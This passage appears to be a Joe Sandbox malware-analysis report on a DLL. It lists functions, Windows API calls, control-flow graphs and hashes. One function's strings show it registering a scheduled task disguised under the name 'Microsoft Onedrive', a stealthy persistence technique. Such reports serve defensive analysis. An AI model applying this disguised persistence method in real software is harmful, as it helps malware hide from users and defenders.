                • Part of subcall function 6F9EC38F: mydllmain.DLL1(?,6F9EAAAA,?,6F9EC639,6F9FB194,6F9FB198,6FA02248,00000014,6F9EC571,6FA02268,00000008,6F9EC6F9,6F9E6503,?,B586E81C,456EBF13), ref: 6F9EC3A6
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F9E2FC3
              • mydllmain.DLL1(?,00000002,00000001,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?), ref: 6F9E2FD9
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain$Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 1337761313-0
              • Opcode ID: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction ID: b97925093bbd51652eede3a5556f00390acfe1ff0f7d462d8c0bc127fa2994aa
              • Opcode Fuzzy Hash: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction Fuzzy Hash: 5921D572A08702AADF135FB5D802FDD3F616F6637CF10481AD4856B1D2DB32D056C612
              Function 6F9EE5D8 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 287 6f9ee5d8-6f9ee5dd 288 6f9ee5df-6f9ee5f7 287->288 289 6f9ee5f9-6f9ee5fd 288->289 290 6f9ee605-6f9ee60e 288->290 289->290 291 6f9ee5ff-6f9ee603 289->291 292 6f9ee620 290->292 293 6f9ee610-6f9ee613 290->293 294 6f9ee67a-6f9ee67e 291->294 297 6f9ee622-6f9ee62f GetStdHandle 292->297 295 6f9ee61c-6f9ee61e 293->295 296 6f9ee615-6f9ee61a 293->296 294->288 298 6f9ee684-6f9ee687 294->298 295->297 296->297 299 6f9ee65c-6f9ee66e 297->299 300 6f9ee631-6f9ee633 297->300 299->294 301 6f9ee670-6f9ee673 299->301 300->299 302 6f9ee635-6f9ee63e GetFileType 300->302 301->294 302->299 303 6f9ee640-6f9ee649 302->303 304 6f9ee64b-6f9ee64f 303->304 305 6f9ee651-6f9ee654 303->305 304->294 305->294 306 6f9ee656-6f9ee65a 305->306 306->294
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6F9EE624
              • GetFileType.KERNELBASE(00000000), ref: 6F9EE636
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: 794e38b7d0b160581cd887f6f084ed83614d568fe34320fa3a6c9d188be21a87
              • Instruction ID: b9c82337add3aca1406bb604f1e19d11d0249ea79b55bfe257f24f1b116c8a2d
              • Opcode Fuzzy Hash: 794e38b7d0b160581cd887f6f084ed83614d568fe34320fa3a6c9d188be21a87
              • Instruction Fuzzy Hash: D011E671A04B524ADB326E3E8C987567AACAF4B734B26071FE0B6871F1C630E4868644
              Function 6F9F2E90 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 326 6f9f2e90-6f9f2e9e 327 6f9f2ef1 326->327 328 6f9f2ea0 326->328 329 6f9f2ef3-6f9f2ef7 327->329 330 6f9f2ea2-6f9f2ea6 328->330 331 6f9f2ea8-6f9f2eaa mydllmain 330->331 332 6f9f2eb6-6f9f2ebc 330->332 343 6f9f2eb0 call 6f9ee5d8 331->343 344 6f9f2eb0 call 6f9ee688 331->344 332->330 333 6f9f2ebe-6f9f2ec1 332->333 333->327 335 6f9f2ec3-6f9f2ec5 333->335 334 6f9f2eb2-6f9f2eb4 334->332 334->333 336 6f9f2eed-6f9f2eef 335->336 337 6f9f2ec7 335->337 336->329 338 6f9f2eca-6f9f2ece 337->338 339 6f9f2ee3-6f9f2eeb 338->339 340 6f9f2ed0-6f9f2ed4 338->340 339->336 339->338 340->339 341 6f9f2ed6-6f9f2ee2 mydllmain 340->341 341->339 343->334 344->334
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction ID: 6f31454d5a35569047882b67defe9587e3a8c6f2a3edcfb6ad8386f54621df05
              • Opcode Fuzzy Hash: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction Fuzzy Hash: C301A232A0669497DF229E599CC43EAB36D9F51220B21052EEC7A6B2C0C771FC4687A0
              Function 6F9F2E87 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 307 6f9f2e87-6f9f2e9e 308 6f9f2ef1 307->308 309 6f9f2ea0 307->309 310 6f9f2ef3-6f9f2ef7 308->310 311 6f9f2ea2-6f9f2ea6 309->311 312 6f9f2ea8-6f9f2eaa mydllmain 311->312 313 6f9f2eb6-6f9f2ebc 311->313 324 6f9f2eb0 call 6f9ee5d8 312->324 325 6f9f2eb0 call 6f9ee688 312->325 313->311 314 6f9f2ebe-6f9f2ec1 313->314 314->308 316 6f9f2ec3-6f9f2ec5 314->316 315 6f9f2eb2-6f9f2eb4 315->313 315->314 317 6f9f2eed-6f9f2eef 316->317 318 6f9f2ec7 316->318 317->310 319 6f9f2eca-6f9f2ece 318->319 320 6f9f2ee3-6f9f2eeb 319->320 321 6f9f2ed0-6f9f2ed4 319->321 320->317 320->319 321->320 322 6f9f2ed6-6f9f2ee2 mydllmain 321->322 322->320 324->315 325->315
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction ID: 306308cec314d3d4e74cb6ca6f566e4aeb82a701340c2a867a4e01a15f8a8999
              • Opcode Fuzzy Hash: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction Fuzzy Hash: A701FC32A066845BDF129E18DCC43AAB36C9F51224B21052EDC766F1C1C735F8468790
              Function 6F9EF9D8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 345 6f9ef9d8-6f9ef9e3 346 6f9ef9e5-6f9ef9ef 345->346 347 6f9ef9f1-6f9ef9f7 345->347 346->347 348 6f9efa25-6f9efa30 call 6f9ee7b1 346->348 349 6f9ef9f9-6f9ef9fa 347->349 350 6f9efa10-6f9efa21 RtlAllocateHeap 347->350 354 6f9efa32-6f9efa34 348->354 349->350 351 6f9ef9fc-6f9efa03 call 6f9f3e49 350->351 352 6f9efa23 350->352 351->348 358 6f9efa05-6f9efa0e call 6f9ec30c 351->358 352->354 358->348 358->350
              APIs
              • RtlAllocateHeap.NTDLL(00000008,00000001,6F9EAAAA,?,6F9EDA5C,00000001,00000364,00000007,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7,F08BD84D), ref: 6F9EFA19
                • Part of subcall function 6F9EC30C: mydllmain.DLL1(?,00000001,?,6F9EFA0B,00000001,?,6F9EDA5C,00000001,00000364,00000007,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7), ref: 6F9EC322
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: AllocateHeapmydllmain
              • String ID:
              • API String ID: 2479503475-0
              • Opcode ID: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction ID: 793bc27fe7137431ded9fd8a40187b7b36361ab248c44a1d3b11f6180b3413a5
              • Opcode Fuzzy Hash: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction Fuzzy Hash: 37F0B436345626ABEF535A26B905A9A379CBF8577CB118117AC18AE1C4FB20E40186E1
              Function 6F9E1000 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 361 6f9e1000-6f9e1005 362 6f9e100d-6f9e1014 call 6f9e2959 ExitProcess 361->362 363 6f9e1007-6f9e100a 361->363
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction ID: 9000987cb098be165034ac60058ec63f69ca38bdac99d9a8f45fba4bf5daea90
              • Opcode Fuzzy Hash: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction Fuzzy Hash: 16B09B3559534296E2415B60444CB1D77545F52257F04C415E169800D4CA20C0958A72

              Non-executed Functions

              Function 6F9E1CFA Relevance: 72.4, APIs: 19, Strings: 22, Instructions: 634comCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • CoInitialize.OLE32(00000000), ref: 6F9E1D40
              • CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
              • CoUninitialize.OLE32 ref: 6F9E1D70
              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000001), ref: 6F9E1DAF
              • VariantInit.OLEAUT32(?), ref: 6F9E1DD0
              • VariantInit.OLEAUT32(?), ref: 6F9E1DE4
              • VariantInit.OLEAUT32(?), ref: 6F9E1DF8
              • VariantInit.OLEAUT32(?), ref: 6F9E1E0C
              • VariantClear.OLEAUT32(?), ref: 6F9E1E5B
              • VariantClear.OLEAUT32(?), ref: 6F9E1E61
              • VariantClear.OLEAUT32(?), ref: 6F9E1E67
              Strings
              • Cannot put trigger ID: %x, xrefs: 6F9E2084
              • Error saving the Task : %x, xrefs: 6F9E22D3
              • Cannot get Root Folder pointer: %x, xrefs: 6F9E1ED1
              • QueryInterface call failed for IExecAction: %x, xrefs: 6F9E215B
              • Failed to create an instance of ITaskService: %x, xrefs: 6F9E1D64
              • Microsoft Onedrive, xrefs: 6F9E1F2C
              • QueryInterface call failed on IRegistrationTrigger: %x, xrefs: 6F9E2040
              • Cannot get Task collection pointer: %x, xrefs: 6F9E2102
              • Cannot get identification pointer: %x, xrefs: 6F9E1F22
              • ITaskService::Connect failed: %x, xrefs: 6F9E1E78
              • Cannot put identification info: %x, xrefs: 6F9E1F6F
              • WlrMakeService, xrefs: 6F9E2252
              • Trigger1, xrefs: 6F9E204A
              • Cannot put the action executable path: %x, xrefs: 6F9E21F2
              • Cannot create action: %x, xrefs: 6F9E212D
              • Cannot put setting info: %x, xrefs: 6F9E1FC7
              • Cannot put registration trigger delay: %x, xrefs: 6F9E20E3
              • Success! Task successfully registered. , xrefs: 6F9E22F9
              • Failed to create a task definition: %x, xrefs: 6F9E1EF9
              • Cannot get settings pointer: %x, xrefs: 6F9E1F8E
              • Cannot get trigger collection: %x, xrefs: 6F9E1FE6
              • Cannot create a registration trigger: %x, xrefs: 6F9E2012
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: Variant$Init$Clear$CreateEnvironmentExpandInitializeInstanceStringsUninitialize
              • String ID: Success! Task successfully registered. $Cannot create a registration trigger: %x$Cannot create action: %x$Cannot get Task collection pointer: %x$Cannot get identification pointer: %x$Cannot get settings pointer: %x$Cannot get trigger collection: %x$Cannot put identification info: %x$Cannot put registration trigger delay: %x$Cannot put setting info: %x$Cannot put the action executable path: %x$Cannot put trigger ID: %x$Error saving the Task : %x$QueryInterface call failed for IExecAction: %x$QueryInterface call failed on IRegistrationTrigger: %x$Cannot get Root Folder pointer: %x$Failed to create a task definition: %x$Failed to create an instance of ITaskService: %x$ITaskService::Connect failed: %x$Microsoft Onedrive$Trigger1$WlrMakeService
              • API String ID: 2658831686-3566640006
              • Opcode ID: 42c6695a63a82ec08f74a29ff94488245a172e16815c6168eb2322a71d64c092
              • Instruction ID: d9b91a67c93a6e78633f593e4d5d2cefa0e9f9397211ab5a18d0edac01286241
              • Opcode Fuzzy Hash: 42c6695a63a82ec08f74a29ff94488245a172e16815c6168eb2322a71d64c092
              • Instruction Fuzzy Hash: EE22827190425AEFDB15DF64D848EEE77B9FF8A318F104258F805AB280DB31E946CB90
              Function 6F9F44AB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 91b34507051fe9f31d01e62d44a0af69232916f8a11847d24c2a85ea0013aa40
              • Instruction ID: c48f016673b61acb54d54f818d155a5d64e5a312ad74a542c43b3dd8e3dca4d4
              • Opcode Fuzzy Hash: 91b34507051fe9f31d01e62d44a0af69232916f8a11847d24c2a85ea0013aa40
              • Instruction Fuzzy Hash: 2AD23871E092298FDB65CE28DD407DAB7B9FB45315F1441EAD40DE7280E778AE828F41
              Function 6F9F4000 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction ID: 6e0fe9c455517ca4ead514f86fe4a5d5c69521affc67d2775cd3a8e353982d36
              • Opcode Fuzzy Hash: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction Fuzzy Hash: 96025E71E012199BDB14CFADDA806DEB7F5FF88314F14826AD915EB384D731A9428F90
              Function 6F9E3741 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E374D
              • IsDebuggerPresent.KERNEL32 ref: 6F9E3819
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E3832
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E383C
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction ID: a35412e01fa201132d4c5444e81ecfd5f67bf1429ad383b26fa6d6b0c2bcf7c0
              • Opcode Fuzzy Hash: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction Fuzzy Hash: D6310875D05319EBDF21DFA4D949BCDBBB8AF18304F1041EAE40DAB290EB719A848F45
              Function 6F9EC07A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6F9EC172
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6F9EC17C
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 6F9EC189
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: df33e72198aceb93eba27497aa5d6791d5f0a88dfaf25e23bf4750e8e5e12e76
              • Instruction ID: 9a796f4e88f29907c47a4aea313fe28bd90ca6e8093beb72380f037720f1c0b5
              • Opcode Fuzzy Hash: df33e72198aceb93eba27497aa5d6791d5f0a88dfaf25e23bf4750e8e5e12e76
              • Instruction Fuzzy Hash: 2D31A575901329ABDB22DF64D888BCDBBB8BF18314F5041EAE41CA7291E7749B858F44
              Function 6F9F9BE9 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,00000001,?,00000008,?,?,6F9F9BE4,00000001,?,00000008,?,?,6F9F97E7,00000000), ref: 6F9F9E16
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 1b54de9015dfd97799804d48c1d8105219401e29f71e2ea8fb72b0241768bb05
              • Instruction ID: f8a69a502fdf11d5a0b5d6556b46e9a22f72768f07db72a17154e050929c31ba
              • Opcode Fuzzy Hash: 1b54de9015dfd97799804d48c1d8105219401e29f71e2ea8fb72b0241768bb05
              • Instruction Fuzzy Hash: EFB148326116089FD715CF28C8C6B947BE0FF45364F258659E8AACF2E9C335E992CB40
              Function 6F9E393B Relevance: 1.6, APIs: 1, Instructions: 147COMMON
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6F9E3951
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: f063a102fc9946367629e0a4957dbcdc03eaa772091a71ce787751ddcf8e69a3
              • Instruction ID: 5df9622af877a4032c20dd2cd6249b77914a125c593f47192cf8f04d45815c09
              • Opcode Fuzzy Hash: f063a102fc9946367629e0a4957dbcdc03eaa772091a71ce787751ddcf8e69a3
              • Instruction Fuzzy Hash: 1A517971A11B05DBDB05CFA5D482BAABBF4FF49324F24842AC456EB290D374E952CF50
              Function 6F9F1C74 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf0f4584f5fb8ecc1ba6e2a29e950920d34b015d340d4787425328992d0b3ead
              • Instruction ID: 2cf6508e19fc3d7f144c0c794b6b019c1df9d9de40abe03163b42e44b6f33b80
              • Opcode Fuzzy Hash: cf0f4584f5fb8ecc1ba6e2a29e950920d34b015d340d4787425328992d0b3ead
              • Instruction Fuzzy Hash: F441CEB5805219AFDB10CF69CC88AEABBBDEF46304F1042D9E459A3281DB30DE858F50
              Function 6F9E9A6C Relevance: 1.6, Strings: 1, Instructions: 385COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 999d3df1e6961e85f05bda3add7c00601db71f4952dcc481a5d522e6c43df2c2
              • Instruction ID: 2fd35aeaf432c7a600526511de097037144542132c5e7f748419c6925ee756b7
              • Opcode Fuzzy Hash: 999d3df1e6961e85f05bda3add7c00601db71f4952dcc481a5d522e6c43df2c2
              • Instruction Fuzzy Hash: 69D1E030A0470A8FCB26CF68C580AAAB7F9FF49314F14461ED56A9B2D9D731F981CB15
              Function 6F9E970D Relevance: 1.6, Strings: 1, Instructions: 333COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
